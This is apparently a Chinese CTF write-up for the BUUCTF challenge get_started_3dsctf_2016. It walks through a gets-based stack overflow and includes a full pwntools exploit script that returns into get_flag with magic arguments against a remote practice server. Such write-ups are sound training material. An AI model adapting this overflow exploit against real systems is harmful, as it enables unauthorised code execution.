BUUCTF[get_started_3dsctf_2016]

步骤

使用checksec查看

使用ida打开,发现存在gets函数

溢出只需要56个字节

搜索发现有个get_flag函数,满足条件会执行打开flag.txt的指令

该函数地址为0x080489A0

我们可以溢出后 覆盖返回到get_flag函数,并且传入符合判断的值

a1的值814536271就是0x308CD64F

由于该题目没开启标准输入输出,于是我们得让函数正常退出来得到回显

exit函数地址0x0804E6A0

exp

python 复制代码
from pwn import *

get_flag=0x080489A0
exit_addr=0x0804E6A0
a1=0x308CD64F
a2=0x195719D1

p=remote('node5.buuoj.cn',28150)
#p=process('./get_started_3dsctf_2016')
context.log_level='debug'
sleep(0.1)

payload = b'a'*56
payload += p32(get_flag)+ p32(exit_addr) + p32(a1) + p32(a2)

p.sendline(payload)
p.interactive()
相关推荐
cipher2 小时前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行3 天前
网络安全总结
安全·web安全
red1giant_star3 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透3 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全
一名优秀的码农3 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
Libraeking3 天前
05 安全边界:MCP Server 的权限沙箱与敏感数据保护
安全
努力的lpp3 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
龙仔7253 天前
在麒麟V10服务器安全加固,sshd防暴力破解加固,实现“密码错误3次封IP”的需求
服务器·tcp/ip·安全
努力的lpp3 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
上海云盾-小余3 天前
即时通讯App的DDoS防御架构设计
运维·服务器·安全